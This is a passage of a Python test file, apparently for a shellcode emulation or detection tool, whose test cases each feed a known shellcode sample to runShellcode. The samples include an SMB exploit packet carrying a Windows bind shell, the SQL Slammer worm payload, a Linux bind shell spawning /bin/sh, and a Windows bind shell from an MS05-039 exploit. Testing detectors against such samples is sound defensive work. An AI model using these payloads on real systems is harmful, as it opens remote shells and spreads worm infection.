+= b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1209 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1210 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1211 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1212 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1213 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1214 | shellcode += 
b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1215 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1216 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1217 | shellcode += b"\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00" 1218 | 1219 | self.runShellcode(shellcode, 22) 1220 | 1221 | def testShellcode23(self): 1222 | """ 1223 | Bindshell::schoenborn 1224 | """ 1225 | 1226 | shellcode = b"\x00\x00\x00\xa4\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8" 1227 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" 1228 | shellcode += b"\x00\x00\x10\x00\x0c\xff\x00\xa4\x00\x04\x11\x0a\x00\x00\x00\x00" 1229 | shellcode += b"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xd4\x00\x00\x80\x69\x00\x4e" 1230 | shellcode += b"\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xe0\x00" 1231 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1232 | shellcode += b"\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00" 1233 | shellcode += b"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" 1234 | shellcode += b"\x35\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00" 1235 | shellcode += b"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" 1236 | shellcode += b"\x2e\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\xda\xff\x53\x4d\x42" 1237 | shellcode += b"\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00" 1238 | shellcode += b"\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x08\x20\x00\x0c\xff\x00\xda" 1239 | shellcode += b"\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00\x57\x00\x00\x00\x00" 1240 | shellcode += b"\x00\xd4\x00\x00\x80\x9f\x00\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03" 1241 | shellcode += b"\x00\x00\x00\x01\x00\x01\x00\x46\x00\x00\x00\x00\x00\x00\x00\x47" 1242 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40" 1243 | shellcode += 
b"\x00\x00\x00\x06\x00\x06\x00\x40\x00\x00\x00\x10\x00\x10\x00\x47" 1244 | shellcode += b"\x00\x00\x00\x15\x8a\x88\xe0\x48\x00\x4f\x00\x44\x00\x00\xed\x41" 1245 | shellcode += b"\x2c\x27\x86\x26\xd2\x59\xa0\xb3\x5e\xaa\x00\x88\x6f\xc5\x57\x00" 1246 | shellcode += b"\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00" 1247 | shellcode += b"\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00" 1248 | shellcode += b"\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00" 1249 | shellcode += b"\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00" 1250 | shellcode += b"\x30\x00\x00\x00\x00\x00\x00\x00\x00\x5c\xff\x53\x4d\x42\x75\x00" 1251 | shellcode += b"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1252 | shellcode += b"\x00\x00\x00\x00\xff\xfe\x00\x08\x30\x00\x04\xff\x00\x5a\x00\x08" 1253 | shellcode += b"\x00\x01\x00\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00" 1254 | shellcode += b"\x2e\x00\x33\x00\x35\x00\x2e\x00\x32\x00\x32\x00\x39\x00\x2e\x00" 1255 | shellcode += b"\x33\x00\x39\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" 1256 | shellcode += b"\x3f\x3f\x3f\x3f\x3f\x00\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00" 1257 | shellcode += b"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1258 | shellcode += b"\x00\x00\x00\x08\x78\x04\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00" 1259 | shellcode += b"\x10\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00" 1260 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" 1261 | shellcode += b"\x00\x00\x40\x00\x00\x00\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00" 1262 | shellcode += b"\x62\x00\x72\x00\x6f\x00\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00" 1263 | shellcode += b"\x00\x00\x00\x9c\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8" 1264 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" 1265 | shellcode += 
b"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00" 1266 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" 1267 | shellcode += b"\x00\x26\x00\x00\x40\x59\x00\x00\x5c\x00\x50\x00\x49\x00\x50\x00" 1268 | shellcode += b"\x45\x00\x5c\x00\x00\x00\x40\x00\x05\x00\x0b\x03\x10\x00\x00\x00" 1269 | shellcode += b"\x48\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00" 1270 | shellcode += b"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4e\x9f\x8d\x3d\xa0\xce\x11" 1271 | shellcode += b"\x8f\x69\x08\x00\x3e\x30\x05\x1b\x01\x00\x00\x00\x04\x5d\x88\x8a" 1272 | shellcode += b"\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00" 1273 | shellcode += b"\x00\x00\x08\x90\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8" 1274 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" 1275 | shellcode += b"\x00\x08\x60\x00\x10\x00\x00\x3c\x08\x00\x00\x00\x01\x00\x00\x00" 1276 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3c\x08\x54\x00\x02" 1277 | shellcode += b"\x00\x26\x00\x00\x40\x4d\x08\x00\x5c\x00\x50\x00\x49\x00\x50\x00" 1278 | shellcode += b"\x45\x00\x5c\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00" 1279 | shellcode += b"\x3c\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00" 1280 | shellcode += b"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4f\x00" 1281 | shellcode += b"\x4f\x00\x54\x00\x5c\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00" 1282 | shellcode += b"\x4d\x00\x5c\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00" 1283 | shellcode += b"\xff\xff\x00\x00\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1284 | shellcode += b"\xc0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" 1285 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1286 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1287 | shellcode += 
b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1288 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1289 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1290 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\xeb\x08\x90\x90\x48\x4f\x44\x88\x90" 1291 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1292 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1293 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff" 1294 | shellcode += b"\xff\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" 1295 | shellcode += b"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" 1296 | shellcode += b"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" 1297 | shellcode += b"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" 1298 | shellcode += b"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b" 1299 | shellcode += b"\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50" 1300 | shellcode += b"\xff\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" 1301 | shellcode += b"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02" 1302 | shellcode += b"\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53" 1303 | shellcode += b"\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x22\xb8\x66\x53\x89\xe1" 1304 | shellcode += b"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x68" 1305 | shellcode += b"\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0\x68\xe5\x49\x86\x49" 1306 | shellcode += b"\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" 1307 | shellcode += b"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x89\xe5\x6a\x50" 1308 | shellcode += b"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d" 1309 | shellcode += 
b"\xfe\x42\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" 1310 | shellcode += b"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51" 1311 | shellcode += b"\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0" 1312 | shellcode += b"\x8b\x57\xfc\x83\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60" 1313 | shellcode += b"\x53\xff\xd6\xff\xd0\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" 1314 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1315 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1316 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1317 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1318 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1319 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1320 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1321 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1322 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1323 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1324 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1325 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1326 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1327 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1328 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1329 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1330 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1331 | shellcode += 
b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1332 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1333 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1334 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1335 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1336 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1337 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1338 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1339 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1340 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1341 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1342 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1343 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1344 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1345 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1346 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1347 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1348 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1349 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1350 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1351 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1352 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1353 | shellcode += 
b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1354 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1355 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1356 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1357 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1358 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1359 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1360 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1361 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1362 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1363 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1364 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1365 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1366 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1367 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1368 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1369 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1370 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1371 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1372 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1373 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1374 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1375 | shellcode += 
b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1376 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1377 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1378 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1379 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1380 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1381 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1382 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1383 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1384 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1385 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1386 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1387 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1388 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1389 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1390 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1391 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1392 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1393 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1394 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1395 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1396 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1397 | shellcode += 
b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1398 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1399 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1400 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1401 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1402 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1403 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1404 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1405 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1406 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1407 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1408 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1409 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\xe0\x07\x00\x00\x04\x00\x00\x00" 1410 | shellcode += b"\x00\x00\x00\x00" 1411 | 1412 | self.runShellcode(shellcode, 23) 1413 | 1414 | def testShellcode24(self): 1415 | """ 1416 | SQLSlammer 1417 | """ 1418 | 1419 | shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x90\x68\xdc\xc9" 1420 | shellcode += b"\xb0\x42\xb8\x01\x01\x01\x01\x31\xc9\xb1\x18\x50\xe2\xfd\x35\x01" 1421 | shellcode += b"\x01\x01\x05\x50\x89\xe5\x51\x68\x2e\x64\x6c\x6c\x68\x65\x6c\x33" 1422 | shellcode += b"\x32\x68\x6b\x65\x72\x6e\x51\x68\x6f\x75\x6e\x74\x68\x69\x63\x6b" 1423 | shellcode += b"\x43\x68\x47\x65\x74\x54\x66\xb9\x6c\x6c\x51\x68\x33\x32\x2e\x64" 1424 | shellcode += b"\x68\x77\x73\x32\x5f\x66\xb9\x65\x74\x51\x68\x73\x6f\x63\x6b\x66" 1425 | shellcode += b"\xb9\x74\x6f\x51\x68\x73\x65\x6e\x64\xbe\x18\x10\xae\x42\x8d\x45" 1426 | shellcode += b"\xd4\x50\xff\x16\x50\x8d\x45\xe0\x50\x8d\x45\xf0\x50\xff\x16\x50" 1427 | shellcode 
+= b"\xbe\x10\x10\xae\x42\x8b\x1e\x8b\x03\x3d\x55\x8b\xec\x51\x74\x05" 1428 | shellcode += b"\xbe\x1c\x10\xae\x42\xff\x16\xff\xd0\x31\xc9\x51\x51\x50\x81\xf1" 1429 | shellcode += b"\x03\x01\x04\x9b\x81\xf1\x01\x01\x01\x01\x51\x8d\x45\xcc\x50\x8b" 1430 | shellcode += b"\x45\xc0\x50\xff\x16\x6a\x11\x6a\x02\x6a\x02\xff\xd0\x50\x8d\x45" 1431 | shellcode += b"\xc4\x50\x8b\x45\xc0\x50\xff\x16\x89\xc6\x09\xdb\x81\xf3\x3c\x61" 1432 | shellcode += b"\xd9\xff\x8b\x45\xb4\x8d\x0c\x40\x8d\x14\x88\xc1\xe2\x04\x01\xc2" 1433 | shellcode += b"\xc1\xe2\x08\x29\xc2\x8d\x04\x90\x01\xd8\x89\x45\xb4\x6a\x10\x8d" 1434 | shellcode += b"\x45\xb0\x50\x31\xc9\x51\x66\x81\xf1\x78\x01\x51\x8d\x45\x03\x50" 1435 | shellcode += b"\x8b\x45\xac\x50\xff\xd6\xeb\xca" 1436 | 1437 | self.runShellcode(shellcode, 24) 1438 | 1439 | def testShellcode25(self): 1440 | """ 1441 | Linux bindshell 1442 | """ 1443 | 1444 | shellcode = b"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" 1445 | shellcode += b"\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0" 1446 | shellcode += b"\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50" 1447 | shellcode += b"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49" 1448 | shellcode += b"\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" 1449 | shellcode += b"\x89\xe3\x51\x53\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80" 1450 | 1451 | self.runShellcode(shellcode, 25) 1452 | 1453 | def testShellcode26(self): 1454 | """ 1455 | Windows bindshell 0.0.0.0:8594 - tried exploit PNP_QueryResConfList/MS05-39 1456 | """ 1457 | 1458 | shellcode = b"\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00\x5c\x00\x30" # |.S.Y.S.T.E.M.\.0| 1459 | shellcode += b"\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00\xff\xff\x00\x00\xe0" # |.0.0.0..........| 1460 | shellcode += b"\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x07\x00\x00\x00" # |................| 1461 | shellcode += 
b"\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x08\x90\x90\x67" # |...............g| 1462 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1463 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1464 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1465 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1466 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\x90\x90\x90\x90\x90" # |.zv....g.zv.....| 1467 | shellcode += b"\x90\x90\xeb\x08\x90\x90\x48\x4f\x44\x88\x90\x90\x90\x90\x90\x90" # |......HOD.......| 1468 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x29\xc9\x83\xe9\xb0" # |...........)....| 1469 | shellcode += b"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19\xf5\x04\x37\x83\xeb" # |...t$.[.s....7..| 1470 | shellcode += b"\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8\xe6\x95\x8f\x5b\x3d" # |......z.......[=| 1471 | shellcode += b"\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc\x56\xed\x8f\x68\x39" # 